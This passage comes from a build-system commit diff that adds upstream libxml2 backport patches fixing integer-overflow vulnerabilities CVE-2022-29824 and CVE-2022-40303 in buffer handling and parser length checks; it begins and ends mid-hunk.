134@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
135 * fill the structure.
136 */
137 ret->value = xmlStrdup(value);
138- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
139+ if (xmlIsStreaming(ctxt)) {
140 /*
141 * Operating in streaming mode, attr is gonna disappear
142 */
143@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
144 xmlChar *
145 xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
146 xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
147- xmlChar *ret, *dst;
148- const xmlChar *src;
149+ xmlChar *ret;
150 xmlAttributePtr attrDecl = NULL;
151 int extsubset = 0;
152
153@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
154 ret = xmlStrdup(value);
155 if (ret == NULL)
156 return(NULL);
157- src = value;
158- dst = ret;
159- while (*src == 0x20) src++;
160- while (*src != 0) {
161- if (*src == 0x20) {
162- while (*src == 0x20) src++;
163- if (*src != 0)
164- *dst++ = 0x20;
165- } else {
166- *dst++ = *src++;
167- }
168- }
169- *dst = 0;
170+ xmlValidNormalizeString(ret);
171 if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
172 xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
173 "standalone: %s on %s value had to be normalized based on external subset declaration\n",
174@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
175 xmlChar *
176 xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
177 const xmlChar *name, const xmlChar *value) {
178- xmlChar *ret, *dst;
179- const xmlChar *src;
180+ xmlChar *ret;
181 xmlAttributePtr attrDecl = NULL;
182
183 if (doc == NULL) return(NULL);
184@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
185 ret = xmlStrdup(value);
186 if (ret == NULL)
187 return(NULL);
188- src = value;
189- dst = ret;
190- while (*src == 0x20) src++;
191- while (*src != 0) {
192- if (*src == 0x20) {
193- while (*src == 0x20) src++;
194- if (*src != 0)
195- *dst++ = 0x20;
196- } else {
197- *dst++ = *src++;
198- }
199- }
200- *dst = 0;
201+ xmlValidNormalizeString(ret);
202 return(ret);
203 }
204
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
new file mode 100644
index 0000000000..63d613cc21
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
1From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Fri, 10 Jan 2020 15:55:07 +0100
4Subject: [PATCH] Fix integer overflow in xmlBufferResize
5
6Found by OSS-Fuzz.
7
8CVE: CVE-2022-29824
9
10Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
11
12Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
13
14---
15 tree.c | 9 +++++++--
16 1 file changed, 7 insertions(+), 2 deletions(-)
17
18diff --git a/tree.c b/tree.c
19index 0d7fc98c..f43f6de1 100644
20--- a/tree.c
21+++ b/tree.c
22@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
23 if (size < buf->size)
24 return 1;
25
26+ if (size > UINT_MAX - 10) {
27+ xmlTreeErrMemory("growing buffer");
28+ return 0;
29+ }
30+
31 /* figure out new size */
32 switch (buf->alloc){
33 case XML_BUFFER_ALLOC_IO:
34 case XML_BUFFER_ALLOC_DOUBLEIT:
35 /*take care of empty case*/
36- newSize = (buf->size ? buf->size*2 : size + 10);
37+ newSize = (buf->size ? buf->size : size + 10);
38 while (size > newSize) {
39 if (newSize > UINT_MAX / 2) {
40 xmlTreeErrMemory("growing buffer");
41@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
42 if (buf->use < BASE_BUFFER_SIZE)
43 newSize = size;
44 else {
45- newSize = buf->size * 2;
46+ newSize = buf->size;
47 while (size > newSize) {
48 if (newSize > UINT_MAX / 2) {
49 xmlTreeErrMemory("growing buffer");
50--
51GitLab
52
53
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
new file mode 100644
index 0000000000..ad7b87dbc6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
1From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Tue, 8 Mar 2022 20:10:02 +0100
4Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
5 xmlBuffer
6
7In several places, the code handling string buffers didn't check for
8integer overflow or used wrong types for buffer sizes. This could
9result in out-of-bounds writes or other memory errors when working on
10large, multi-gigabyte buffers.
11
12Thanks to Felix Wilhelm for the report.
13
14CVE: CVE-2022-29824
15
16Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
17
18Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
19
20---
21 buf.c | 86 +++++++++++++++++++++++-----------------------------------
22 tree.c | 72 ++++++++++++++++++------------------------------
23 2 files changed, 61 insertions(+), 97 deletions(-)
24
25diff --git a/buf.c b/buf.c
26index 24368d37..40a5ee06 100644
27--- a/buf.c
28+++ b/buf.c
29@@ -30,6 +30,10 @@
30 #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
31 #include "buf.h"
32
33+#ifndef SIZE_MAX
34+#define SIZE_MAX ((size_t) -1)
35+#endif
36+
37 #define WITH_BUFFER_COMPAT
38
39 /**
40@@ -156,6 +160,8 @@ xmlBufPtr
41 xmlBufCreateSize(size_t size) {
42 xmlBufPtr ret;
43
44+ if (size == SIZE_MAX)
45+ return(NULL);
46 ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
47 if (ret == NULL) {
48 xmlBufMemoryError(NULL, "creating buffer");
49@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
50 ret->error = 0;
51 ret->buffer = NULL;
52 ret->alloc = xmlBufferAllocScheme;
53- ret->size = (size ? size+2 : 0); /* +1 for ending null */
54- ret->compat_size = (int) ret->size;
55+ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
56+ ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
57 if (ret->size){
58 ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
59 if (ret->content == NULL) {
60@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
61 CHECK_COMPAT(buf)
62
63 if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
64- if (buf->use + len < buf->size)
65+ if (len < buf->size - buf->use)
66 return(buf->size - buf->use);
67+ if (len > SIZE_MAX - buf->use)
68+ return(0);
69
70- /*
71- * Windows has a BIG problem on realloc timing, so we try to double
72- * the buffer size (if that's enough) (bug 146697)
73- * Apparently BSD too, and it's probably best for linux too
74- * On an embedded system this may be something to change
75- */
76-#if 1
77- if (buf->size > (size_t) len)
78- size = buf->size * 2;
79- else
80- size = buf->use + len + 100;
81-#else
82- size = buf->use + len + 100;
83-#endif
84+ if (buf->size > (size_t) len) {
85+ size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
86+ } else {
87+ size = buf->use + len;
88+ size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
89+ }
90
91 if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
92 /*
93@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
94 int
95 xmlBufResize(xmlBufPtr buf, size_t size)
96 {
97- unsigned int newSize;
98+ size_t newSize;
99 xmlChar* rebuf = NULL;
100 size_t start_buf;
101
102@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
103 case XML_BUFFER_ALLOC_IO:
104 case XML_BUFFER_ALLOC_DOUBLEIT:
105 /*take care of empty case*/
106- newSize = (buf->size ? buf->size*2 : size + 10);
107+ if (buf->size == 0) {
108+ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
109+ } else {
110+ newSize = buf->size;
111+ }
112 while (size > newSize) {
113- if (newSize > UINT_MAX / 2) {
114+ if (newSize > SIZE_MAX / 2) {
115 xmlBufMemoryError(buf, "growing buffer");
116 return 0;
117 }
118@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
119 }
120 break;
121 case XML_BUFFER_ALLOC_EXACT:
122- newSize = size+10;
123+ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
124 break;
125 case XML_BUFFER_ALLOC_HYBRID:
126 if (buf->use < BASE_BUFFER_SIZE)
127 newSize = size;
128 else {
129- newSize = buf->size * 2;
130+ newSize = buf->size;
131 while (size > newSize) {
132- if (newSize > UINT_MAX / 2) {
133+ if (newSize > SIZE_MAX / 2) {
134 xmlBufMemoryError(buf, "growing buffer");
135 return 0;
136 }
137@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
138 break;
139
140 default:
141- newSize = size+10;
142+ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
143 break;
144 }
145
146@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
147 */
148 int
149 xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
150- unsigned int needSize;
151+ size_t needSize;
152
153 if ((str == NULL) || (buf == NULL) || (buf->error))
154 return -1;
155@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
156 if (len < 0) return -1;
157 if (len == 0) return 0;
158
159- needSize = buf->use + len + 2;
160- if (needSize > buf->size){
161+ if ((size_t) len >= buf->size - buf->use) {
162+ if ((size_t) len >= SIZE_MAX - buf->use)
163+ return(-1);
164+ needSize = buf->use + len + 1;
165 if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
166 /*
167 * Used to provide parsing limits
168@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
169 */
170 int
171 xmlBufCCat(xmlBufPtr buf, const char *str) {
172- const char *cur;
173-
174- if ((buf == NULL) || (buf->error))
175- return(-1);
176- CHECK_COMPAT(buf)
177- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
178- if (str == NULL) {
179-#ifdef DEBUG_BUFFER
180- xmlGenericError(xmlGenericErrorContext,
181- "xmlBufCCat: str == NULL\n");
182-#endif
183- return -1;
184- }
185- for (cur = str;*cur != 0;cur++) {
186- if (buf->use + 10 >= buf->size) {
187- if (!xmlBufResize(buf, buf->use+10)){
188- xmlBufMemoryError(buf, "growing buffer");
189- return XML_ERR_NO_MEMORY;
190- }
191- }
192- buf->content[buf->use++] = *cur;
193- }
194- buf->content[buf->use] = 0;
195- UPDATE_COMPAT(buf)
196- return 0;
197+ return xmlBufCat(buf, (const xmlChar *) str);
198 }
199
200 /**
201diff --git a/tree.c b/tree.c
202index 9d94aa42..86afb7d6 100644
203--- a/tree.c
204+++ b/tree.c
205@@ -7104,6 +7104,8 @@ xmlBufferPtr
206 xmlBufferCreateSize(size_t size) {
207 xmlBufferPtr ret;
208
209+ if (size >= UINT_MAX)
210+ return(NULL);
211 ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
212 if (ret == NULL) {
213 xmlTreeErrMemory("creating buffer");
214@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
215 }
216 ret->use = 0;
217 ret->alloc = xmlBufferAllocScheme;
218- ret->size = (size ? size+2 : 0); /* +1 for ending null */
219+ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
220 if (ret->size){
221 ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
222 if (ret->content == NULL) {
223@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
224
225 if ((mem == NULL) || (size == 0))
226 return(NULL);
227+ if (size > UINT_MAX)
228+ return(NULL);
229
230 ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
231 if (ret == NULL) {
232@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
233 */
234 int
235 xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
236- int size;
237+ unsigned int size;
238 xmlChar *newbuf;
239
240 if (buf == NULL) return(-1);
241
242 if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
243- if (len + buf->use < buf->size) return(0);
244+ if (len < buf->size - buf->use)
245+ return(0);
246+ if (len > UINT_MAX - buf->use)
247+ return(-1);
248
249- /*
250- * Windows has a BIG problem on realloc timing, so we try to double
251- * the buffer size (if that's enough) (bug 146697)
252- * Apparently BSD too, and it's probably best for linux too
253- * On an embedded system this may be something to change
254- */
255-#if 1
256- if (buf->size > len)
257- size = buf->size * 2;
258- else
259- size = buf->use + len + 100;
260-#else
261- size = buf->use + len + 100;
262-#endif
263+ if (buf->size > (size_t) len) {
264+ size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
265+ } else {
266+ size = buf->use + len;
267+ size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
268+ }
269
270 if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
271 size_t start_buf = buf->content - buf->contentIO;
272@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
273 case XML_BUFFER_ALLOC_IO:
274 case XML_BUFFER_ALLOC_DOUBLEIT:
275 /*take care of empty case*/
276- newSize = (buf->size ? buf->size : size + 10);
277+ if (buf->size == 0)
278+ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
279+ else
280+ newSize = buf->size;
281 while (size > newSize) {
282 if (newSize > UINT_MAX / 2) {
283 xmlTreeErrMemory("growing buffer");
284@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
285 }
286 break;
287 case XML_BUFFER_ALLOC_EXACT:
288- newSize = size+10;
289+ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
290 break;
291 case XML_BUFFER_ALLOC_HYBRID:
292 if (buf->use < BASE_BUFFER_SIZE)
293@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
294 break;
295
296 default:
297- newSize = size+10;
298+ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
299 break;
300 }
301
302@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
303 if (len < 0) return -1;
304 if (len == 0) return 0;
305
306- needSize = buf->use + len + 2;
307- if (needSize > buf->size){
308+ if ((unsigned) len >= buf->size - buf->use) {
309+ if ((unsigned) len >= UINT_MAX - buf->use)
310+ return XML_ERR_NO_MEMORY;
311+ needSize = buf->use + len + 1;
312 if (!xmlBufferResize(buf, needSize)){
313 xmlTreeErrMemory("growing buffer");
314 return XML_ERR_NO_MEMORY;
315@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
316 */
317 int
318 xmlBufferCCat(xmlBufferPtr buf, const char *str) {
319- const char *cur;
320-
321- if (buf == NULL)
322- return(-1);
323- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
324- if (str == NULL) {
325-#ifdef DEBUG_BUFFER
326- xmlGenericError(xmlGenericErrorContext,
327- "xmlBufferCCat: str == NULL\n");
328-#endif
329- return -1;
330- }
331- for (cur = str;*cur != 0;cur++) {
332- if (buf->use + 10 >= buf->size) {
333- if (!xmlBufferResize(buf, buf->use+10)){
334- xmlTreeErrMemory("growing buffer");
335- return XML_ERR_NO_MEMORY;
336- }
337- }
338- buf->content[buf->use++] = *cur;
339- }
340- buf->content[buf->use] = 0;
341- return 0;
342+ return xmlBufferCat(buf, (const xmlChar *) str);
343 }
344
345 /**
346--
347GitLab
348
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
new file mode 100644
index 0000000000..bdb9e9eb7a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
1From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Thu, 25 Aug 2022 17:43:08 +0200
4Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
5
6Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
7to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
8XML_MAX_HUGE_LENGTH (1 billion bytes).
9
10Move some the length checks to the end of the respective loop to make
11them strict.
12
13xmlParseEntityValue didn't have a length limitation at all. But without
14XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
15
16Thanks to Maddie Stone working with Google Project Zero for the report!
17
18CVE: CVE-2022-40303
19Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
20Comments: Refreshed hunk
21
22Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
23---
24 parser.c | 233 +++++++++++++++++++++++++++++--------------------------
25 1 file changed, 121 insertions(+), 112 deletions(-)
26
27diff --git a/parser.c b/parser.c
28index 93f031be..79479979 100644
29--- a/parser.c
30+++ b/parser.c
31@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
32 * *
33 ************************************************************************/
34
35+#define XML_MAX_HUGE_LENGTH 1000000000
36+
37 #define XML_PARSER_BIG_ENTITY 1000
38 #define XML_PARSER_LOT_ENTITY 5000
39
40@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
41 errmsg = "Malformed declaration expecting version";
42 break;
43 case XML_ERR_NAME_TOO_LONG:
44- errmsg = "Name too long use XML_PARSE_HUGE option";
45+ errmsg = "Name too long";
46 break;
47 #if 0
48 case:
49@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
50 int len = 0, l;
51 int c;
52 int count = 0;
53+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
54+ XML_MAX_TEXT_LENGTH :
55+ XML_MAX_NAME_LENGTH;
56
57 #ifdef DEBUG
58 nbParseNameComplex++;
59@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
60 if (ctxt->instate == XML_PARSER_EOF)
61 return(NULL);
62 }
63- len += l;
64+ if (len <= INT_MAX - l)
65+ len += l;
66 NEXTL(l);
67 c = CUR_CHAR(l);
68 }
69@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
70 if (ctxt->instate == XML_PARSER_EOF)
71 return(NULL);
72 }
73- len += l;
74+ if (len <= INT_MAX - l)
75+ len += l;
76 NEXTL(l);
77 c = CUR_CHAR(l);
78 }
79 }
80- if ((len > XML_MAX_NAME_LENGTH) &&
81- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
82+ if (len > maxLength) {
83 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
84 return(NULL);
85 }
86@@ -3338,7 +3344,10 @@ const xmlChar *
87 xmlParseName(xmlParserCtxtPtr ctxt) {
88 const xmlChar *in;
89 const xmlChar *ret;
90- int count = 0;
91+ size_t count = 0;
92+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
93+ XML_MAX_TEXT_LENGTH :
94+ XML_MAX_NAME_LENGTH;
95
96 GROW;
97
98@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
99 in++;
100 if ((*in > 0) && (*in < 0x80)) {
101 count = in - ctxt->input->cur;
102- if ((count > XML_MAX_NAME_LENGTH) &&
103- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
104+ if (count > maxLength) {
105 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
106 return(NULL);
107 }
108@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
109 int len = 0, l;
110 int c;
111 int count = 0;
112+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
113+ XML_MAX_TEXT_LENGTH :
114+ XML_MAX_NAME_LENGTH;
115 size_t startPosition = 0;
116
117 #ifdef DEBUG
118@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
119 while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
120 (xmlIsNameChar(ctxt, c) && (c != ':'))) {
121 if (count++ > XML_PARSER_CHUNK_SIZE) {
122- if ((len > XML_MAX_NAME_LENGTH) &&
123- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
124- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
125- return(NULL);
126- }
127 count = 0;
128 GROW;
129 if (ctxt->instate == XML_PARSER_EOF)
130 return(NULL);
131 }
132- len += l;
133+ if (len <= INT_MAX - l)
134+ len += l;
135 NEXTL(l);
136 c = CUR_CHAR(l);
137 if (c == 0) {
138@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
139 c = CUR_CHAR(l);
140 }
141 }
142- if ((len > XML_MAX_NAME_LENGTH) &&
143- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
144+ if (len > maxLength) {
145 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
146 return(NULL);
147 }
148@@ -3459,7 +3465,10 @@ static const xmlChar *
149 xmlParseNCName(xmlParserCtxtPtr ctxt) {
150 const xmlChar *in, *e;
151 const xmlChar *ret;
152- int count = 0;
153+ size_t count = 0;
154+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
155+ XML_MAX_TEXT_LENGTH :
156+ XML_MAX_NAME_LENGTH;
157
158 #ifdef DEBUG
159 nbParseNCName++;
160@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
161 goto complex;
162 if ((*in > 0) && (*in < 0x80)) {
163 count = in - ctxt->input->cur;
164- if ((count > XML_MAX_NAME_LENGTH) &&
165- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
166+ if (count > maxLength) {
167 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
168 return(NULL);
169 }
170@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
171 const xmlChar *cur = *str;
172 int len = 0, l;
173 int c;
174+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
175+ XML_MAX_TEXT_LENGTH :
176+ XML_MAX_NAME_LENGTH;
177
178 #ifdef DEBUG
179 nbParseStringName++;
180@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
181 if (len + 10 > max) {
182 xmlChar *tmp;
183
184- if ((len > XML_MAX_NAME_LENGTH) &&
185- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
186- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
187- xmlFree(buffer);
188- return(NULL);
189- }
190 max *= 2;
191 tmp = (xmlChar *) xmlRealloc(buffer,
192 max * sizeof(xmlChar));
193@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
194 COPY_BUF(l,buffer,len,c);
195 cur += l;
196 c = CUR_SCHAR(cur, l);
197+ if (len > maxLength) {
198+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
199+ xmlFree(buffer);
200+ return(NULL);
201+ }
202 }
203 buffer[len] = 0;
204 *str = cur;
205 return(buffer);
206 }
207 }
208- if ((len > XML_MAX_NAME_LENGTH) &&
209- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
210+ if (len > maxLength) {
211 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
212 return(NULL);
213 }
214@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
215 int len = 0, l;
216 int c;
217 int count = 0;
218+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
219+ XML_MAX_TEXT_LENGTH :
220+ XML_MAX_NAME_LENGTH;
221
222 #ifdef DEBUG
223 nbParseNmToken++;
224@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
225 if (len + 10 > max) {
226 xmlChar *tmp;
227
228- if ((max > XML_MAX_NAME_LENGTH) &&
229- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
230- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
231- xmlFree(buffer);
232- return(NULL);
233- }
234 max *= 2;
235 tmp = (xmlChar *) xmlRealloc(buffer,
236 max * sizeof(xmlChar));
237@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
238 COPY_BUF(l,buffer,len,c);
239 NEXTL(l);
240 c = CUR_CHAR(l);
241+ if (len > maxLength) {
242+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
243+ xmlFree(buffer);
244+ return(NULL);
245+ }
246 }
247 buffer[len] = 0;
248 return(buffer);
249@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
250 }
251 if (len == 0)
252 return(NULL);
253- if ((len > XML_MAX_NAME_LENGTH) &&
254- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
255+ if (len > maxLength) {
256 xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
257 return(NULL);
258 }
259@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
260 int len = 0;
261 int size = XML_PARSER_BUFFER_SIZE;
262 int c, l;
263+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
264+ XML_MAX_HUGE_LENGTH :
265+ XML_MAX_TEXT_LENGTH;
266 xmlChar stop;
267 xmlChar *ret = NULL;
268 const xmlChar *cur = NULL;
269@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
270 GROW;
271 c = CUR_CHAR(l);
272 }
273+
274+ if (len > maxLength) {
275+ xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
276+ "entity value too long\n");
277+ goto error;
278+ }
279 }
280 buf[len] = 0;
281 if (ctxt->instate == XML_PARSER_EOF)
282@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
283 xmlChar *rep = NULL;
284 size_t len = 0;
285 size_t buf_size = 0;
286+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
287+ XML_MAX_HUGE_LENGTH :
288+ XML_MAX_TEXT_LENGTH;
289 int c, l, in_space = 0;
290 xmlChar *current = NULL;
291 xmlEntityPtr ent;
292@@ -3925,16 +3925,6 @@
293 while (((NXT(0) != limit) && /* checked */
294 (IS_CHAR(c)) && (c != '<')) &&
295 (ctxt->instate != XML_PARSER_EOF)) {
296- /*
297- * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
298- * special option is given
299- */
300- if ((len > XML_MAX_TEXT_LENGTH) &&
301- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
302- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
303- "AttValue length too long\n");
304- goto mem_error;
305- }
306 if (c == 0) break;
307 if (c == '&') {
308 in_space = 0;
309@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
310 }
311 GROW;
312 c = CUR_CHAR(l);
313+ if (len > maxLength) {
314+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
315+ "AttValue length too long\n");
316+ goto mem_error;
317+ }
318 }
319 if (ctxt->instate == XML_PARSER_EOF)
320 goto error;
321@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
322 } else
323 NEXT;
324
325- /*
326- * There we potentially risk an overflow, don't allow attribute value of
327- * length more than INT_MAX it is a very reasonable assumption !
328- */
329- if (len >= INT_MAX) {
330- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
331- "AttValue length too long\n");
332- goto mem_error;
333- }
334-
335 if (attlen != NULL) *attlen = (int) len;
336 return(buf);
337
338@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
339 int len = 0;
340 int size = XML_PARSER_BUFFER_SIZE;
341 int cur, l;
342+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
343+ XML_MAX_TEXT_LENGTH :
344+ XML_MAX_NAME_LENGTH;
345 xmlChar stop;
346 int state = ctxt->instate;
347 int count = 0;
